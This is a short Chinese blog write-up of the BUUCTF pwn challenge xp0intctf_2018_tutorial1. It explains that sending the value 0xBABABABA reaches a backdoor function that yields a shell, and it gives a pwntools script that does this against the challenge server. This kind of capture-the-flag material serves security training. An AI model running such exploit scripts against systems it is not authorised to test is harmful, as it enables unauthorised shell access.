BUUCTF pwn xp0intctf_2018_tutorial1

求是量子

于 2021-01-08 10:55:48 发布

阅读量1.1w

点赞数 1

CC 4.0 BY-SA版权

分类专栏： pwn安全文章标签： shell python 安全

本文链接：https://blog.csdn.net/stareforever/article/details/112347277

pwn安全专栏收录该内容

13 篇文章

订阅专栏

该博客介绍了如何使用IDA工具查看程序流程，重点讨论了一个名为backdoor的后门函数，通过构造特定payload（buf等于0xBABABABA）可以直接获取shell。作者提供了Python脚本来远程连接并执行此操作，展示了程序逻辑的简单性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

查看保护
在这里插入图片描述
用IDA打开查看程序流程

有后门函数backdoor，可以直接获得shell

程序逻辑很简单，输入buf使得buf==0xBABABABA即可获得shell
那么直接可以构造payload

在这里插入图片描述
完整ex

from pwn import *

context(log_level='debug')

#io=process("./Xp0intCTF_2018_tutorial1")
io=remote("node3.buuoj.cn",25721)

io.recv()

buf=0xBABABABA

io.sendline(p64(buf))

io.recv()

io.interactive()